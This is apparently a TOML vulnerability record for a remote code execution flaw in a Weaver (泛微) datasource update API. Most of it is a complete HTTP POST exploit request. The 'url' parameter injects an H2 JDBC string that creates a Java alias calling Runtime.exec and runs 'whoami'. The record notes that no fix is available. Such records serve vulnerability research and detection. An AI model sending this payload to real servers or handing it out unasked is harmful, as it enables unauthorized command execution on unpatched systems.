vendor = "泛微"
name = "泛微datasource update jdbc远程代码执行"
type = "RCE"
version = "未知"
path = "/api/integration/datasource/update/"
detail = "POST /api/integration/datasource/update/ HTTP/1.1 Host: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip Connection: keep-alive Content-Length: 377 Content-Type: application/x-www-form-urlencoded Cookie: __clusterSessionIDCookieName=adcf474c-8ca4-4002-b0d7-ce6e32486666;__clusterSessionCookieName=4D368CCF5613FEED9A080A2013810BDE; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246 pointid=aaa&type=sqlserver2025&iscluster=2&username=333&port=1&dbname=aaaa&password=11&usepool=1&minconn=5&maxconn=10&sortid=1&id=1&operate=test&host=abc&url=jdbc:h2:mem:test;MODE=MSSQLSERVER;INIT=CREATE ALIAS EXEC AS $$ String exec(String cmd) throws java.lang.Exception { return java.lang.Runtime.getRuntime().exec(cmd).getInputStream().toString(); } $$\\;CALL EXEC('whoami');"
fix = "暂无解决方案"
date = "0707"
label = "1day"
verifier = "AdySec"
